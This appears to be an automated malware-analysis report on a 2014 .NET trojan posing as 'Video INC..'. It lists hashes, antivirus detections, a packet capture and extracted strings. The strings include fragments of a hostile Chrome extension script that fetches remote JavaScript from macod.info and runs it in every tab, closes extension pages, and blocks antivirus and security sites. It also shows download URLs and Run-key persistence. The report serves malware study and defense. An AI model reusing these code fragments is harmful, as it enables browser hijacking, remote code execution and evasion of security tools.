Analysis Date: 2018-05-02 04:41:00
MD5: 49eb890a8017c93d47132b06b2ea0c2c
SHA1: 3973360d5aeb9dcb5b654a6b2ed15e8e18b2c50c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section .text md5: b959eacca7e44773de48171831f819f6 sha1: bcbc11410ebc7cbe2375aa072f8dbc1c08afa654 size: 10240
Section .rsrc md5: a585ac5771da81c7ba0aa8ae76ff476d sha1: 741d85bfab480e153e9a9e8ee187c1b69185609e size: 96256
Section .reloc md5: cc334fb95d5231e0539bf847a049351f sha1: fd0582021fb2f5366db47b8acc5264e40ba86611 size: 512
Timestamp: 2014-07-05 18:57:26
Pdb path: C:\Documents and Settings\User\Belgelerim\Visual Studio 2010\Projects\WindowsFormsApplication1\WindowsFormsApplication1\obj\x86\Debug\WindowsFormsApplication1.pdb
Version: LegalCopyright: Video INC.. 2014
Assembly Version: 1.0.0.0
InternalName: WindowsFormsApplication1.exe
FileVersion: 1.0.0.0
CompanyName: Video INC..
Comments: Video INC..
ProductName: Video INC..
ProductVersion: 1.0.0.0
FileDescription: Video INC..
OriginalFilename: WindowsFormsApplication1.exe
Packer: Microsoft Visual C# v7.0 / Basic .NET
PEhash: f41d18370763b914d164b3a427a937efec9d549c
IMPhash: f34d5f2d4577ed6d9ceec516c1f5a744
AV 360 Safe: Trojan.GenericKD.1743389
AV Ad-Aware: Trojan.GenericKD.1743389
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Backdoor.AMNT-0361
AV Avira (antivir): TR/Kilim.D.29
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Kilim.r3
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.GenericKD.1743389
AV Eset (nod32): MSIL/ExtenBro.B
AV Fortinet: no_virus
AV Frisk (f-prot): W32/Backdoor2.HUUI (exact)
AV F-Secure: Trojan.GenericKD.1743389
AV Grisoft (avg): PSW.ILUSpy
AV Ikarus: Trojan-PSW.ILUSpy
AV K7: Trojan ( 0049d1551 )
AV Kaspersky: Trojan-Downloader.MSIL.ExtInst.c
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: Trojan:MSIL/Kilim.D
AV MicroWorld (escan): Trojan.GenericKD.1743389
AV Norman: winpe/Troj_Generic.UYPKC
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen.2
AV Trend Micro: TROJ_SPNR.09GN14
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 36313a35 3335370d 0a0d0a3c   00.161:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a366231 65626362 312d6362 38382d34   :6b1ebcb1-cb88-4
0x00000280 (00640)   3266622d 38653433 2d623538 66306131   2fb-8e43-b58f0a1
0x00000290 (00656)   66336631 393c2f77 73613a4d 65737361   f3f19</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3061 32306630   >urn:uuid:0a20f0
0x00000340 (00832)   33362d37 3464332d 34393361 2d383337   36-74d3-493a-837
0x00000350 (00848)   322d6433 34383833 66303963 61323c2f   2-d34883f09ca2</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings
...
000004b0
1.0.0.0
Assembly Version
bg.js
chrome
Comments
CompanyName
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\WINDOWSUPDATE
C:\WINDOWSUPDATE\winupdater.exe
Extensions
FileDescription
FileVersion
Form1
\Google\Chrome\
http://clckq.ms/macod/bg.js
http://clckq.ms/macod/manifest.json
http://clckq.ms/macod/Preferences.txt
\iacffndadciecdcopofkkegcpcmnjpph\
InternalName
LegalCopyright
manifest
manifest.json
OriginalFilename
Preferences
ProductName
ProductVersion
runas
Software\Microsoft\Windows\CurrentVersion\Run
StringFileInfo
Translation
VarFileInfo
Video INC..
Video INC.. 2014
VS_VERSION_INFO
WindowsFormsApplication1.exe
WindowsFormsApplication1.Properties.Resources
winupdater.exe
<;:?<;:
=<;?=<;
><<?><<
                                };
                        }
                ) {
                }
        },
        }, {
        });
-,,?-,,
,++?,++
?==??==
/.-?/.-
.-,?.-,
@>>?@>>
@?>?@?>
*)(?*)(?*)(?*))
+*)?+*)
+**?+**
			?			
0//?0//
0/.?0/.
1.0.0.0
10.0.0.0
100o210?210?210?210?210?210?210?210?100
210?210?210?10/
210?210?210?210?210?210?210?210?100o100
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
$592f93d3-2413-41c8-b6a8-b597ca802f75
;:9?;:9
;99?;99
A@??A@?
add_Load
add_Tick
Application
ApplicationSettingsBase
</assembly>
Assembly
AssemblyCompanyAttribute
AssemblyConfigurationAttribute
AssemblyCopyrightAttribute
AssemblyCultureAttribute
AssemblyDescriptionAttribute
AssemblyFileVersionAttribute
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
AssemblyProductAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
AssemblyVersionAttribute
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AutoScaleMode
["blocking"]);
                                        cancel: true
.cctor
C:\Documents and Settings\User\Belgelerim\Visual Studio 2010\Projects\WindowsFormsApplication1\WindowsFormsApplication1\obj\x86\Debug\WindowsFormsApplication1.pdb
                        'chrome://chrome/extensions' ||
        chrome.tabs.executeScript(key.id, {
chrome.tabs.get(keyId, function (key) {
chrome.tabs.onUpdated.addListener(
chrome.tabs.onUpdated.addListener(function (keyId) {
                        chrome.tabs.remove(key.id);
chrome.webRequest.onBeforeRequest.addListener(
            code: xhr.responseText
CompilationRelaxationsAttribute
CompilerGeneratedAttribute
components
ComVisibleAttribute
Concat
Container
ContainerControl
Control
_CorExeMain
CreateDirectory
CreateSubKey
Culture
CultureInfo
CurrentUser
DebuggableAttribute
DebuggerNonUserCodeAttribute
DebuggingModes
Default
defaultInstance
Directory
DirectoryInfo
Dispose
disposing
DownloadFileAsync
EditorBrowsableAttribute
EditorBrowsableState
EnableVisualStyles
Environment
EventArgs
EventHandler
Exception
Exists
Form1_Load
                for (var i = 0; i < ibneler.length; i++) {
        function (details) {
        function (keyid, x, key) {
GeneratedCodeAttribute
get_Assembly
get_bg
get_Culture
GetCurrent
get_Default
GetDirectories
get_ExecutablePath
GetFolderPath
get_manifest
get_Preferences
GetProcessesByName
get_ResourceManager
get_StartInfo
GetString
GetTypeFromHandle
GuidAttribute
IContainer
IDisposable
                if (key.url ==
    if (key.url.indexOf('devtools://') < 0) {
                        if (url.indexOf(ibneler[i]) > -1) {
if (xhr.readyState == 4) {
InitializeComponent
IsInRole
                        key.url == 'chrome://extensions/'
                        key.url == 'opera://extensions' ||
KIH?KIH?KIH?KIH?KIH
KIH?KIH?KIH?KIH?KII
KJI?KJI
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
LJJ?LJJ
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
manifest
Microsoft.Win32
MKJ?MKJ
<Module>
mscoree.dll
mscorlib
NLK?NLK
*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(o*)(
*)(o*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(?*)(
Object
OML?OML
PADPADP
PNM?PNM
PON?PON
Preferences
Process
ProcessStartInfo
Program
QON?QON
ReferenceEquals
Registry
RegistryKey
@.reloc
Replace
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
resourceCulture
resourceMan
ResourceManager
Resources
ResumeLayout
                                return {
RPO?RPO
RSDS52	
`.rsrc
RuntimeCompatibilityAttribute
RuntimeTypeHandle
SearchOption
    </security>
    <security>
sender
set_AutoScaleDimensions
set_AutoScaleMode
set_ClientSize
SetCompatibleTextRenderingDefault
set_Culture
set_FileName
set_Interval
set_Name
set_Text
Settings
SettingsBase
SetValue
set_Verb
SpecialFolder
STAThreadAttribute
String
#Strings
SuspendLayout
Synchronized
System
System.CodeDom.Compiler
System.ComponentModel
System.Configuration
System.Diagnostics
System.Drawing
System.Globalization
System.IO
System.Net
System.Reflection
System.Resources
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Security.Principal
System.Threading
System.Windows.Forms
!This program cannot be run in DOS mode.
Thread
timer1
timer1_Tick
ToString
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
                urls: ["<all_urls>"]
v2.0.50727
var ibneler = ['nod32.com','nod32.com.tr','facebook.com/csp.php','kingusd.com','vatansana.com','wjetphp.com','jscmd.net','video-izleyin.tk','virustotal.com','avast.com','eset.com','microsoft.com','virusscan.jotti.org','jotti.org','avg.com','kaspersky.com.tr','kaspersky.com','facebook.com/ajax/webstorage/process_keys.php','facebook.com/checkpoint/malware/cr_ext_config','facebook.com/checkpoint/malware/cr_ext_log','sansurcrx.com','dl.dropboxusercontent.com/s','sosyalmedyakusu.com','fiddle.jshell.net','fei-coder.com','docs.google.com','drive.google.com','orjinalmarket.net','facebook.com/ajax/follow/unfollow_profile.php','vuupc.com','mcafee.com','googlecode.com','akamai.net','facebook.com/xti.php','.exe','rackcdn.com'];
                var url = details.url;
var xhr = new XMLHttpRequest();
Video INC..
Video INC.. 2014
WebClient
WindowsBuiltInRole
WindowsFormsApplication1
WindowsFormsApplication1.exe
WindowsFormsApplication1.Form1.resources
WindowsFormsApplication1.Properties
WindowsFormsApplication1.Properties.Resources.resources
WindowsIdentity
WindowsPrincipal
WrapNonExceptionThrows
xhr.onreadystatechange = function () {
xhr.open("GET",'http://macod.info/macod/main.php?' + Math.random() * 999999, true);
xhr.send();
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX?[YX